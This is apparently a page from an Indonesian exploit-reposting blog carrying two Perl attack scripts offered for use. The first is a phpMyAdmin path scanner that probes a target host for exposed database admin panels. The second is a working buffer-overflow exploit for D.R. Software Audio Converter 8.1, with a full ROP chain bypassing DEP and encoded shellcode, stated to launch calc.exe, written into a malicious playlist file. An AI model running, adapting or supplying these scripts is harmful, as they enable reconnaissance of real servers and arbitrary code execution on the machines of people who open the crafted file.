Tampilkan postingan dengan label Exploite. Tampilkan semua postingan
Yakamoz phpMyAdmin Finder
06.12PHP
#!/usr/bin/perl #*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* # # //////////////////////////////////// # Yakamoz PHPmyadmin Finder v.x.x # //////////////////////////////////// # # Title : PHPmyadmin Finder # Author: Bl4ck.Viper # From : Azarbycan # Category : Remote # Emails : Bl4ck.Viper@Yahoo.com , Bl4ck.Viper@Hotmail.com , Bl4ck.Viper@Gmail.com # #*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-* use HTTP::Request; use LWP::UserAgent; system ("cls"); system ("title Bl4ck.Viper (Yakamoz)..."); print "\t\t/////////////////////////////////////////////////\n"; print "\t\t_________________________________________________\n"; print "\t\t\t PHPmyadmin Finder v.x.x\n"; print "\t\t\t Coded By Bl4ck.Viper\n"; print "\t\t\t Made In Azarbycan\n"; print "\t\t\t Version In English\n"; print "\t\t_________________________________________________\n"; print "\n\n"; sleep (1); print "\n\n"; print "\t HOST=> (ex: http://www.site.com)\n"; print "\t HOST=> :"; $host=<STDIN>; chomp($host); if($host !~ /http:\/\//) { $host = "http://$host"; }; print "\n\n"; print "\t\t*-*-*-*-*-* Scanning *-*-*-*-*-*\n"; print "\n\n"; @p = ("/phpMyAdmin/", "/phpmyadmin/", "/PMA/", "/admin/", "/dbadmin/", "/mysql/", "/myadmin/", "/phpmyadmin2/", "/phpMyAdmin2/", "/phpMyAdmin-2/", "/php-my-admin/", "/phpMyAdmin-2.2.3/", "/phpMyAdmin-2.2.6/", "/phpMyAdmin-2.5.1/", "/phpMyAdmin-2.5.4/", "/phpMyAdmin-2.5.5-rc1/", "/phpMyAdmin-2.5.5-rc2/", "/phpMyAdmin-2.5.5/", "/phpMyAdmin-2.5.5-pl1/", "/phpMyAdmin-2.5.6-rc1/", "/phpMyAdmin-2.5.6-rc2/", "/phpMyAdmin-2.5.6/", "/phpMyAdmin-2.5.7/", "/phpMyAdmin-2.5.7-pl1/", "/phpMyAdmin-2.6.0-alpha/", "/phpMyAdmin-2.6.0-alpha2/", "/phpMyAdmin-2.6.0-beta1/", "/phpMyAdmin-2.6.0-beta2/", "/phpMyAdmin-2.6.0-rc1/", "/phpMyAdmin-2.6.0-rc2/", "/phpMyAdmin-2.6.0-rc3/", "/phpMyAdmin-2.6.0/", "/phpMyAdmin-2.6.0-pl1/", "/phpMyAdmin-2.6.0-pl2/", "/phpMyAdmin-2.6.0-pl3/", "/phpMyAdmin-2.6.1-rc1/", "/phpMyAdmin-2.6.1-rc2/", "/phpMyAdmin-2.6.1/", "/phpMyAdmin-2.6.1-pl1/", "/phpMyAdmin-2.6.1-pl2/", "/phpMyAdmin-2.6.1-pl3/", "/phpMyAdmin-2.6.2-rc1/", "/phpMyAdmin-2.6.2-beta1/", "/phpMyAdmin-2.6.2-rc1/", "/phpMyAdmin-2.6.2/", "/phpMyAdmin-2.6.2-pl1/", "/phpMyAdmin-2.6.3/", "/phpMyAdmin-2.6.3-rc1/", "/phpMyAdmin-2.6.3/", "/phpMyAdmin-2.6.3-pl1/", "/phpMyAdmin-2.6.4-rc1/", "/phpMyAdmin-2.6.4-pl1/", "/phpMyAdmin-2.6.4-pl2/", "/phpMyAdmin-2.6.4-pl3/", "/phpMyAdmin-2.6.4-pl4/", "/phpMyAdmin-2.6.4/", "/phpMyAdmin-2.7.0-beta1/", "/phpMyAdmin-2.7.0-rc1/", "/phpMyAdmin-2.7.0-pl1/", "/phpMyAdmin-2.7.0-pl2/", "/phpMyAdmin-2.7.0/", "/phpMyAdmin-2.8.0-beta1/", "/phpMyAdmin-2.8.0-rc1/", "/phpMyAdmin-2.8.0-rc2/", "/phpMyAdmin-2.8.0/", "/phpMyAdmin-2.8.0.1/", "/phpMyAdmin-2.8.0.2/", "/phpMyAdmin-2.8.0.3/", "/phpMyAdmin-2.8.0.4/", "/phpMyAdmin-2.8.1-rc1/", "/phpMyAdmin-2.8.1/", "/phpMyAdmin-2.8.2/", "/sqlmanager/", "/mysqlmanager/", "/p/m/a/", "/PMA2005/", "/pma2005/", "/phpmanager/", "/php-myadmin/", "/phpmy-admin/", "/webadmin/", "/sqlweb/", "/websql/", "/webdb/", "/mysqladmin/", "/mysql-admin/"); foreach $myadmin(@p){ $url = $host.$myadmin; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new(); $response = $useragent->request($request); if ($response->is_success){print "Found : $url\n";} if ($response->content=~ /Access Denied/){print "Found : $url =>[Error & Access Denied]\n";} else {print "NotFound : $myadmin\n";} Source : http://www.exploit-id.com/ |
D.R. Software Audio Converter 8.1 DEP Bypass Exploit
06.08
WINDOWS
#!/usr/bin/perl # #[+]Exploit Title: D.R. Software Audio Converter 8.1 DEP Bypass Exploit #[+]Date: 13\08\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html #[+]Found By: Sud0 from Corelan Team(http://www.exploit-db.com/exploits/13760/) or also created KedAns-Dz(http://1337day.com/exploits/16248) #[+]Version: 8.1 #[+]Tested On: WIN-XP SP3 Brazilian Portuguese #[+]CVE: N/A # print q{ Created By C4SS!0 G0M3S E-mail louredo_@hotmail.com Site net-fuzzer.blogspot.com }; print "\n\t\t[+]Creating Exploit File...\n"; sleep(2); #####################################ROP FOR LoadLibraryA############################## my $rop = pack('V',0x00430076); # POP ECX # RETN $rop .= pack('V',0x0044B274); # Endereco de LoadLibraryA $rop .= pack('V',0x1003d56e); # POP ESI # RETN $rop .= pack('V',0x10055FBD); # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to LoadLibraryA $rop .= pack('V',0x10068022); # POP EBP # RETN $rop .= pack('V',0x1003AA1A); # ADD ESP,28 # RETN 04 $rop .= pack('V',0x0040aaf2); # POP EDI # RETN $rop .= pack('V',0x1002ef15); #RETN $rop .= pack('V',0x1002ef14); # PUSHAD # RETN $rop .= "kernel32.dll\x00"; $rop .= "A" x 11; #####################################ROP END HERE####################################### #####################################ROP FOR GetProcAddress############################# $rop .= pack('V',0x1002ef15) x 3; #RETN $rop .= pack('V',0x00430076); # POP ECX # RETN $rop .= pack('V',0x0044B1E8); # Endereco de GetProcAddress $rop .= pack('V',0x0040aaf2); # POP EDI # RETN $rop .= pack('V',0x10055FBD); # MOV EAX,DWORD PTR DS:[ECX] # JMP EAX // And JMP to GetProcAddress $rop .= pack('V',0x1006809f); # POP ESI # RETN $rop .= pack('V',0x1003AA1A); # ADD ESP,28 # RETN 04 $rop .= pack('V',0x00447b7d); # XCHG EAX,EBP # RETN $rop .= pack('V',0x1002ef14); # PUSHAD # RETN $rop .= "VirtualProtect\x00"; $rop .= "D" x 9; # Junk #####################################ROP END HERE####################################### ################################ROP FOR VirtualProtect################################## $rop .= pack('V',0x1002ef15) x 4; #RETN $rop .= pack('V',0x10037d05); # XCHG EAX,ESI # RETN $rop .= pack('V',0x100753c0); # PUSH ESP # POP EBP # POP EBX # ADD ESP,10 # RETN $rop .= "A" x 20; # Junk $rop .= pack('V',0x10015a15); # XCHG EAX,EBP # RETN $rop .= pack('V',0x1004108e) x 20; # ADD EAX,0A # RETN $rop .= pack('V',0x1007275D); # MOV ECX,EAX # MOV EAX,ESI # POP ESI # RETN 10 $rop .= "A" x 4; $rop .= pack('V',0x1002ef15) x 5; #RETN $rop .= pack('V',0x10037d05); # XCHG EAX,ESI # RETN $rop .= pack('V',0x10068022); # POP EBP # RETN $rop .= pack('V',0x0040A8F4); # CALL ESP // Endereço de retorno da funçao $rop .= pack('V',0x100080ea); # POP EBX # RETN $rop .= pack('V',0x00001000); # Valor de dwSize $rop .= pack('V',0x10082cde); # POP EDX # RETN $rop .= pack('V',0x00000040); # Valor de flNewProtect $rop .= pack('V',0x1007076e); # POP EDI # RETN $rop .= pack('V',0x1002ef15); # RETN $rop .= pack('V',0x1002ef14); # PUSHAD # RETN $rop .= "\x90" x 25; # Some nops $rop .= "\xeb\x10"; # Little jmp to fix shellcode. :) $rop .= "\x90" x 20; # More nops ####################################ROP END HERE##################################### my $shellcode = "\xb8\x4b\xaf\x2d\x0e\xda\xde\xd9\x74\x24\xf4\x5b\x29\xc9" . "\xb1\x32\x83\xeb\xfc\x31\x43\x0e\x03\x08\xa1\xcf\xfb\x72" . "\x55\x86\x04\x8a\xa6\xf9\x8d\x6f\x97\x2b\xe9\xe4\x8a\xfb" . "\x79\xa8\x26\x77\x2f\x58\xbc\xf5\xf8\x6f\x75\xb3\xde\x5e" . "\x86\x75\xdf\x0c\x44\x17\xa3\x4e\x99\xf7\x9a\x81\xec\xf6" . "\xdb\xff\x1f\xaa\xb4\x74\x8d\x5b\xb0\xc8\x0e\x5d\x16\x47" . "\x2e\x25\x13\x97\xdb\x9f\x1a\xc7\x74\xab\x55\xff\xff\xf3" . "\x45\xfe\x2c\xe0\xba\x49\x58\xd3\x49\x48\x88\x2d\xb1\x7b" . # Shellcode Winexec "Calc.exe" "\xf4\xe2\x8c\xb4\xf9\xfb\xc9\x72\xe2\x89\x21\x81\x9f\x89" . # Bad chars "\x00\x20\x3d\x0a\x0d\xff" "\xf1\xf8\x7b\x1f\xe4\x5a\x0f\x87\xcc\x5b\xdc\x5e\x86\x57" . "\xa9\x15\xc0\x7b\x2c\xf9\x7a\x87\xa5\xfc\xac\x0e\xfd\xda" . "\x68\x4b\xa5\x43\x28\x31\x08\x7b\x2a\x9d\xf5\xd9\x20\x0f" . "\xe1\x58\x6b\x45\xf4\xe9\x11\x20\xf6\xf1\x19\x02\x9f\xc0" . "\x92\xcd\xd8\xdc\x70\xaa\x17\x97\xd9\x9a\xbf\x7e\x88\x9f" . "\xdd\x80\x66\xe3\xdb\x02\x83\x9b\x1f\x1a\xe6\x9e\x64\x9c" . "\x1a\xd2\xf5\x49\x1d\x41\xf5\x5b\x7e\x04\x65\x07\x81"; my $buf = "A" x 180; $buf .= pack('V',0x1001bc95); # ADD ESP,1010 # RETN 04 $buf .= "A" x 4112; $buf .= pack('V',0x10071916) x 2; # RETN $buf .= pack('V',0x10071910); # ADD ESP,100 # RETN $buf .= "C" x (4436-length($buf)); $buf .= pack('V',0x10029cfd); # ADD ESP,814 # RETN $buf .= "A" x 124; $buf .= $rop; $buf .= $shellcode; $buf .= "D" x (30000-length($buf)); open(f,">Exploit.pls") or die "[*]Error: $!\n"; print f $buf; close f; print "\t\t[+]File Exploit.pls Created successfully.\n"; sleep(1);